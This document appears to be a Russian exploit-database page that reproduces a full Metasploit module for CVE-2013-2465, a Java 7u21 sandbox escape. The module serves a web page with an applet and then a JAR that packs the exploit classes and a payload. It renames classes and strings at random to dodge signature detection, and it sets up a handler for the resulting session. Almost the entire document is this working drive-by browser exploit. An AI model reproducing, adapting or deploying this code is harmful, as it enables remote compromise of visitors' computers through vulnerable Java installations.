Java storeImageArray() Invalid Array Indexing Exploit

Свойства

Дата публикации:
23.08.2013
Цель:
ava <=7u21
Тип воздействия:
Компрометация системы
Описание уязвимости:
Множественные уязвимости в Oracle Java

Код

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##
 
require 'msf/core'
require 'rex'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = GreatRanking # Because there isn't click2play bypass, plus now Java Security Level High by default
 
  include Msf::Exploit::Remote::HttpServer::HTML
 
  include Msf::Exploit::Remote::BrowserAutopwn
  autopwn_info({ :javascript => false })
 
  def initialize( info = {} )
    super( update_info( info,
      'Name'          => 'Java storeImageArray() Invalid Array Indexing Vulnerability',
      'Description'   => %q{
        This module abuses an Invalid Array Indexing Vulnerability on the
        static function storeImageArray() function in order to produce a
        memory corruption and finally escape the Java Sandbox. The vulnerability
        affects Java version 7u21 and earlier. The module, which doesn't bypass
        click2play, has been tested successfully on Java 7u21 on Windows and
        Linux systems.
      },
      'License'       => MSF_LICENSE,
      'Author'        =>
        [
          'Unknown',  # From PacketStorm
          'sinn3r', # Metasploit
          'juan vazquez' # Metasploit
        ],
      'References'    =>
        [
          [ 'CVE', '2013-2465' ],
          [ 'OSVDB', '96269' ],
          [ 'EDB', '27526' ],
          [ 'URL', 'http://packetstormsecurity.com/files/122777/' ],
          [ 'URL', 'http://hg.openjdk.java.net/jdk7u/jdk7u-dev/jdk/rev/2a9c79db0040' ]
        ],
      'Platform'      => [ 'java', 'win', 'linux' ],
      'Payload'       => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'       =>
        [
          [ 'Generic (Java Payload)',
            {
              'Arch'     => ARCH_JAVA,
              'Platform' => 'java'
            }
          ],
          [ 'Windows Universal',
            {
              'Arch'     => ARCH_X86,
              'Platform' => 'win'
            }
          ],
          [ 'Linux x86',
            {
              'Arch'     => ARCH_X86,
              'Platform' => 'linux'
            }
          ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Aug 12 2013'
      ))
  end
 
  def setup
    path = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2013-2465", "Exploit.class")
    @exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2013-2465", "Exploit$MyColorModel.class")
    @color_model_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2013-2465", "Exploit$MyColorSpace.class")
    @color_space_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
 
    @exploit_class_name = rand_text_alpha("Exploit".length)
    @color_model_class_name = rand_text_alpha("MyColorModel".length)
    @color_space_class_name = rand_text_alpha("MyColorSpace".length)
 
    @exploit_class.gsub!("Exploit", @exploit_class_name)
    @exploit_class.gsub!("MyColorModel", @color_model_class_name)
    @exploit_class.gsub!("MyColorSpace", @color_space_class_name)
 
    @color_model_class.gsub!("Exploit", @exploit_class_name)
    @color_model_class.gsub!("MyColorModel", @color_model_class_name)
    @color_model_class.gsub!("MyColorSpace", @color_space_class_name)
 
 
    @color_space_class.gsub!("Exploit", @exploit_class_name)
    @color_space_class.gsub!("MyColorModel", @color_model_class_name)
    @color_space_class.gsub!("MyColorSpace", @color_space_class_name)
 
    super
  end
 
  def on_request_uri( cli, request )
    print_debug("Requesting: #{request.uri}")
    if request.uri !~ /\.jar$/i
      if not request.uri =~ /\/$/
        print_status("Sending redirect...")
        send_redirect(cli, "#{get_resource}/", '')
        return
      end
 
      print_status("Sending HTML...")
      send_response_html(cli, generate_html, {'Content-Type'=>'text/html'})
      return
    end
 
    print_status("Sending .jar file...")
    send_response(cli, generate_jar(cli), {'Content-Type'=>'application/java-archive'})
 
    handler( cli )
  end
 
  def generate_html
    jar_name = rand_text_alpha(5+rand(3))
    html = %Q|<html>
    <head>
    </head>
    <body>
    <applet archive="#{jar_name}.jar" code="#{@exploit_class_name}" width="1000" height="1000">
    </applet>
    </body>
    </html>
    |
    html = html.gsub(/^\t\t/, '')
    return html
  end
 
  def generate_jar(cli)
 
    p = regenerate_payload(cli)
    jar  = p.encoded_jar
 
    jar.add_file("#{@exploit_class_name}.class", @exploit_class)
    jar.add_file("#{@exploit_class_name}$#{@color_model_class_name}.class", @color_model_class)
    jar.add_file("#{@exploit_class_name}$#{@color_space_class_name}.class", @color_space_class)
    metasploit_str = rand_text_alpha("metasploit".length)
    payload_str = rand_text_alpha("payload".length)
    jar.entries.each { |entry|
      entry.name.gsub!("metasploit", metasploit_str)
      entry.name.gsub!("Payload", payload_str)
      entry.data = entry.data.gsub("metasploit", metasploit_str)
      entry.data = entry.data.gsub("Payload", payload_str)
    }
    jar.build_manifest
 
    return jar.pack
  end
 
end
или введите имя

CAPTCHA